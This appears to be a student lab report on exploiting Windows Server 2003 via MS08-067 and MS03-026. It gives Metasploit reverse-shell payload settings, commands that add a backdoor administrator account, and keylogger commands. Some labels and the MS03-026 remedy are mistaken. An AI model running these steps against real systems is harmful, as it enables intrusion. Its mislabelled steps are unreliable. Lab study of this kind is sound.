windows server 2003 系统提权
《系统提权》作业
课程名称:《系统提权》 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【要求】
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
二、测试工具
三、被测设备信息情况 1.基本信息
2.端口开放情况
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞名称】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08_067 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞描述】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 发布日期:2008/10/22 下载大小:因操作系统而异 说明:微软安全公告KB958644 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 发布日期:2008/10/22 下载大小:因操作系统而异。 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装后,可能必须重新启动计算机。 严重等级:Windows 2000;XP;Server 2003为严重,Windows Vista;Server 2008;7 Beta为重要 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【解决措施】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
MS08-067漏洞的终端用户解决方案 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
【漏洞验证】 |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
指令:mafconsole
指令:search ms08_067 3使用ma08_067_netapi 指令:use exploit/windows/smb/ms08_067_netapi 4.查看攻击载荷 指令:Show payloads 5. 设置windows/meterpreter/reverse_tcp载荷 指令: set payload windows/meterpreter/reverse_tcp
6.查看需要配置的参数 指令: show options 7.设置参数 Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称 指令: set lhost 10.10.10.130 set rhost 10.10.10.131 set target 3 8.发动攻击 指令:exploit 9.进入shell创建用户 指令:shell net user hgc 123 /add 10.设置为超级用户 指令: net localgroup administrators hgc /add 11.对目标主机屏幕截取
指令: keysscan_start keyscan_dump keyscan_stop 13.创建文件 指令:mkdir hgc |
【漏洞名称】 |
MS03_026 |
【漏洞描述】 |
1、Remote Procedure Call (RPC)是Windows 操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行程序的无缝地在远程系统上执行代码。协议本身源自开放软件基 金会的RPC协议,Microsoft在其基础上增加了自己的一些扩展。 eEye的研究人员发现,由于Windows RPC DCOM接口对报文的长度域缺乏检查导致发生基于堆的溢出,远程***者可以利用这些漏洞以本地系统权限在系统上执行任意指令。 漏洞实质上影响的是使用RPC的DCOM接口,此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。***者通过向目标发送畸形 RPC DCOM请求来利用这些漏洞。成功利用此漏洞可以以本地系统权限执行任意指令。***者可以在系统上执行任意操作 ,如安装程序、查看或更改、删除数据或创建系统管理员权限的帐户。 使用者可以通过 135(UDP/TCP)、137/UDP、138/UDP、139/TCP、445(UDP/TCP)、593/TCP端口进行攻击。对于启动了COM Internet服务和RPC over HTTP的用户来说,还可能通过80/TCP和443/TCP端口进行***。 2、Microsoft DCOM RPC相关系统漏洞,具体内容即为MS03-026和MS03-039.正因为此,造成Blaster.Worm(冲击波).以及 w32.Nachi.Worm(冲击波杀手)蠕虫病毒在校园网络中的泛滥.而且DCOM RPC漏洞的remote root ,可以让一个不具备任何基础知识的攻击者,在2分钟之内进入到你的计算机系统中,他所做的仅仅是从网上下载一个简单的攻击工具和一个扫描工具就可以了. 查找ms03-026系统漏洞的利用: msf>search ms03_026 显示找到的ms03-026的路径 msf>use exploit/windows/.../ms03_026_dcom 进入后可以输入 msf exploit(ms03_026_dcom) > show options 来查看所需要输入的参数 msf exploit(ms03_026_dcom) > show payloads 显示当前模块的所有攻击载荷。攻击载荷是我们希望在目标系统被渗透后去执行的代码。 msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp 选择一个反弹式的shell msf exploit(ms03_026_dcom) > set RHOST 192.168.250.157 msf exploit(ms03_026_dcom) > set LHOST 192.168.250.135 输入靶机地址和攻击机的地址 msf exploit(ms03_026_dcom) > exploit 开始进行渗透攻击 |
【解决措施】 |
解决方法:首先,打开“管理工具”→“服务”管理器,在服务管理器的主窗口服务列表中,找到名称为“Cryptographic Services”的服务项,双击该服务项,在弹出的该服务项属性对话框中,单击“停止”按钮,停止该服务。然后,在资源管理器中,打开系统安装目录\\System32\\文件夹,在该文件夹下,找到名为“catroot2”的文件夹,将其删除或重命名。最后在服务管理器中,将“Cryptographic Services”服务启动,并安装系统漏洞补丁,一般就可以正常安装系统补丁了 通过命令行的方法来解决:1、在开始中运行cmd,2、在窗口中运行net stop cryptsvc,回车,3、ren %systemroot%\system32\catroot2 oldcatroot2,回车,4、net start cryptsvc,回车,5、exit,回车。然后就可以了 其实其实现过程是一样的。把Cryptographic Services这个服务给修复好就可以了。 即使在命令行提示符下输入 1、在开始中运行cmd |
【漏洞验证】 |
指令:msfconsole
指令search MS03_026 3.执行该文件 指令: use exploit/windows/dcerpc/ms03_026_dcom 4.查看攻击载荷 指令:show payload 5.设置攻击载荷 指令: set payload windows/meterpreter/reverse_tcp 6.查看需要设置的参数 指令: show options 7.设置参数 Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称 指令: set lhost 10.10.10.130 set rhost 10.10.10.131 set target 0 8.开始运行
指令: net user hgc2 123 /add
指令: net localgroup administrators hgc2 /add 11.远程桌面登录 成功连接远程主机 新建文件夹 返回虚拟机查看 可以看到文件夹成功出现,这表明系统管理员账户创建成功,远程主机连接成功 12.上传文件 指令:upload /root/user.txt 返回windows 2003查看 |
教程下载地址:https://download.csdn.net/download/qq_38162763/10594297
本次教程结束
windows server 2003 系统提权相关推荐
- 服务器2003 系统修复,第十一篇 Windows Server 2003系统修复.pdf
第十一章 Windows Server 2003系统修复 windows Server 2003提供了各种系 统防护与修复措施统防护与修复措施,,主要包括主要包括:: 磁盘容错系统磁盘容错系统 ((见 ...
- 联想旭日410M笔记本,在Windows Server 2003系统下的声卡驱动安装问题
我的本本型号是联想旭日410M430X4512060Bb,其声卡型号是Conexant HD Audio 5045,装完系统之后,无法安装声卡驱动,给联想的客服打电话,他们也解决不了,说没有针对Win ...
- Windows Server 2003系统重装步骤
Windows Server 2003系统重装步骤 一.重装前的备份 因为装一个干净的系统,必然需要格式化C盘,所以我们要把C盘的数据备份出来.据我的经验,主要包括:桌面的文件.我的文档中的文件.QQ ...
- 微软服务器系统还原,怎么进行windows server 2003系统还原
在Windows Server 2003中安装"系统还原"功能 在Windows Server 2003系统中安装"系统还原"功能时,首先需要准备一张Windo ...
- 7代cpu能装虚拟xp系统吗_Windows server 2008 R2和Windows server 2003系统有什么区别?
作为专业的服务器供应商,遇到了很多客户都会问Windows 2008和2003系统有什么区别?为此,今天和大家分享一下08和03的不同之处 1.2003相对于2008系统版本比较低,导致附带的功能组件 ...
- Nagios监控Windows server 2003 系统
一.Nagios监控主机配置 [root@nagios ~]# cp /usr/local/nagios/etc/nagios.cfg /usr/local/nagios/etc/nagios.cfg ...
- F41G-UT 安装Windows server 2003系统后无法安装显卡驱动的解决办法
几经折腾,还是把系统换成了windows server 2003,可是安装显卡驱动的时候怎么安装不上,下载了官方的驱动也不行,难道没有2003下面的驱动?不可能,只要XP可以,2003也应该可以的啊, ...
- 安装Windows server 2003系统后无法安装显卡驱动的解决办法 (转载)
转载 几经折腾,还是把系统换成了windows server 2003,可是安装显卡驱动的时候怎么安装不上,下载了官方的驱动也不行,难道没有2003下面的驱动?不可能,只要XP可以,2003也应该可以 ...
- 一次windows server 2003系统修复过程
2013年5月31日星期五 今天应朋友F的邀请,去帮他修复了一台IBM X3650服务器的win2003系统.我觉得这个问题比较常见,所以想着记录下来,或者有备于自己将来参考. 首先,介绍一下系统出 ...
- PE系统下安装windows server 2003
本文由秀依林枫提供友情赞助,首发于烂泥行天下. 前几天被安装了一个任务,重装公司的一台服务器系统.明确要求安装windows server 2003系统. 你懂得啊,现在安装系统基本上不使用光盘了.使 ...
最新文章
- 如何学习streamdecoder类_如何学习篇5:强化2种能力——2种学习模式之运动类:隐性学习...
- nanomsg(ZeroMQ with C)
- LR菜鸟入门 -- LightRoom安装/预设
- 京东搞促销,天猫下黑手
- 15.django之Django-Rest-Framework
- 三电平igbt死区时间计算_基于大功率三电平IGBT模块并联的参考设计
- Entity Framework 4.1 (强转)
- Python DearPyGui 项目实践
- elk查询nginx日志响应时间
- 实战matlab之文件与数据接口技术,实战MATLAB之文件与数据接口技术
- 基于Multisim的220v转12v典型开关电源电路仿真
- 代码分析工具 - SonarQube
- 前端Table用JS导出Excel数字自动变成科学计数法问题
- CPU0704报错处理
- 淘宝购买win10激活码流程
- 关于cesium1.92以上版本无法加载draco压缩模型问题
- 传智播客dos命令_命令行英雄,原始播客
- VB.NET转C# Constants.vbCrLf替换
- android虚拟手机云之二:应用多开
- 【江枫】lvm2与powerpath的Found duplicate PV问题